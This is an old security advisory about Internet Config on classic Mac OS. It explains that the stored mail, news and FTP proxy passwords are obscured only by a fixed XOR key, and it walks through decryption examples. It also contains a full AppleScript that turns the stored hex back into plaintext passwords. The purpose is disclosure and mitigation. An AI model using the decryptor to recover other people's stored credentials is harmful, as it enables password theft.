StaticUsers.net – Internet Config Advisory
Password weakness in Internet Config in MacOS
What is Internet Config?
From Internet Config FAQ: “The Internet Configuration System was designed to make your life easier by reducing the number of times which you need to enter your Internet preferences into the various preferences dialogs of all your Internet applications.
For example, currently you need to enter your Email address into many common
Macintosh Internet applications, for example Eudora, NewsWatcher and Anarchie.
The goal of the system was to get each of these applications to get this information
from one common place and to give you a tool to edit these common preferences.”
For example: When You install Power Mail 2.3.1 You can find Internet Config 2.0 in
Power Mail folder. You can use it to set Your Internet configuration and then click
on the “Use Internet Config” option when You set your e-mail account. Internet Config allows You among others to set Email Password, News Password and FTP
Proxy Password. All of these passwords are coded the same way.
Where can You find a password?
In Internet Preferences file in Preferences folder. Open this file using resource editor (ResEdit for instant) and open ICRP resource. Here You can find encrypted passwords: MailPassword, NewsAuthPassword and FTPProxyPassword. You can also find them with any hex editor, but offset depends on configuration.
Some examples
09 38 3E 3F 31 2E 29 3D 34 30 = nightrain
08 14 3B 39 3A 31 1F 33 3A = BlackDog
09 3B 38 37 37 36 32 3B 35 2A = moonlight
06 19 02 0C 15 1B 0C = OUTLAW
05 37 27 28 35 3F = apple
The first bite is the length of the password, so we don’t need it.
AA BB CC DD EE FF GG HH II JJ = aa bb cc dd ee ff gg hh ii jj
where:
AA BB CC DD EE FF GG HH II JJ – encrypted password (hex)
aa bb cc dd ee ff gg hh ii jj – decrypted password in ASCII codes (hex)
aa=AA XOR 56H
bb=BB XOR 57H
cc=CC XOR 58H
dd=DD XOR 59H
ee=EE XOR 5AH
ff=FF XOR 5BH
gg=GG XOR 5CH
hh=HH XOR 5DH
ii=II XOR 5EH
jj=JJ XOR 5FH
and so on…
An example:
38H XOR 56H = 6EH = n
3EH XOR 57H = 69H = i
3FH XOR 58H = 67H = g
31H XOR 59H = 68H = h
2EH XOR 5AH = 74H = t
29H XOR 5BH = 72H = r
3DH XOR 5CH = 61H = a
34H XOR 5DH = 69H = i
30H XOR 5EH = 6EH = n
Solution
Don’t use it or at least don’t enter any password. I wonder why Netscape support it for example.
tested on:
Internet Config v.1.3, v.1.4, v.2.0 and v.2.0.2
Netscape Messenger 4.5, PowerMail 2.3.1, E(asy)-mail 2.0,
From the Internet Config FAQ:
“The following programs supported Internet Config before 8 Nov 1995. NewsWatcher 2.0b21 and higher, Register 1.1 and higher, NotifyMail 2.5 and higher, BlitzMail 2.0.2 and higher, MacGzip 0.2.2 and higher, FTPd 2.4.0 and higher, ICeTEe 1.1 and higher, Internet Config Access, Mpack 1.5 and higher, BBEdit 3.1.1 and higher, NewsHopper 1.1 and higher, Anarchie 1.5.0 and higher, NCSA Telnet 2.6.1d7 and higher, Black Night 0.1.4 and higher, DropURL 1.1 and higher, CyberFinder, Symantec Project Manager 8.0.3 and higher, Personal Log 2.0 and higher, most programs based on the WASTE text editing engine, Claris Emailer, Fetch 3.0b5 and higher, PowerMail, ICScriptor, Kapito, Style 1.3.2 and higher, Internet Toolkit, NetSnagger.”
Simply Apple Script to show the weakness of the password.
Usage: Don’t enter first number and don’t use spaces between.
For exapmle: 383E3F312E293D3430, but not 09383E3F312E293D3430 or 38 3E 3F 31 2E 29 3D 34 30.
(* IC Pass 2.1 by adix 21.07.99; Apple Script English *)
set hex1 to text returned of (display dialog “Enter encrypted password:” default answer “”
buttons {” Ok “} default button ” Ok “)
set Alicia to “01010110010101110101100001011001010110100101101101011100
010111010101111001011111”
set pass to “”
set i to 1
set skok to 0
set ile to count items in hex1
if ile = 1 or ile = 0 then
set pass to “”
else
repeat until (i > (ile – 1))
set kodascii to 0
set zn to items (i) thru (i + 1) in hex1
set lbin to hex2bin(zn) as string
repeat with a from 1 to 8
set bit2 to item (a + skok) of Alicia
set bit1 to item a of lbin
if (bit1 = bit2) then
set bitk to “0”
else
set bitk to “1”
end if
set kodascii to {kodascii + bitk * (2 ^ (8 – a))}
end repeat
set pass to {pass & (ASCII character kodascii)}
set skok to skok + 8
set i to i + 2
end repeat
end if
display dialog “Password: ” & pass & return & return & “by adix” buttons {” Ok “} default button ” Ok ”
on hex2bin(zn)
set temphex to {“0000”, “0001”, “0010”, “0011”, “0100”, “0101”, “0110”, “0111”, “1000”, “1001”,
“1010”, “1011”, “1100”, “1101”, “1110”, “1111”}
set t2hex to “0123456789ABCDEF”
set bin to “” as string
repeat with j in zn
set t1 to j as string
repeat with i from 1 to (count items in t2hex)
if ((item i in t2hex) = t1) then
set temp to (item i in temphex)
exit repeat
end if
end repeat
set bin to {bin & temp} as string
end repeat
return (bin)
end hex2bin
Solutions
From the Internet Config FAQ:
IC does provide the ability for applications to share preferences. Any information you enter into Internet Config can be accessed by any other software you execute on your machine.
This includes preferences like the email password. You should be aware that such passwords are available to any software on your computer. IC stores passwords in a non-secure fashion.
While each password is scrambled to prevent idle viewing with ResEdit, the scrambling algorithm is publicly documented in the IC Programming Kit. Anyone with a trivial programming background can access these passwords.
Note: This situation is no different from the passwords you enter into other applications. When you ask a program (such Users & Groups) to store a password, it must be stored in some file somewhere on your hard disk. The only difference is that IC provides a public API for getting at these passwords. The important thing to keep in mind is that you should not install software that you do not trust on your machine.
Note: If you ignore this advice (and install software you do not trust on to your computer), password secrecy is the least of your problems. Specifically, the Mac OS does not prevent a program from erasing the entire contents of your hard disk.
If you want to know which applications are accessing which IC preferences, you can install:
ICAccess Logger (ftp://ftp.stairways.com/stairways/hacks/).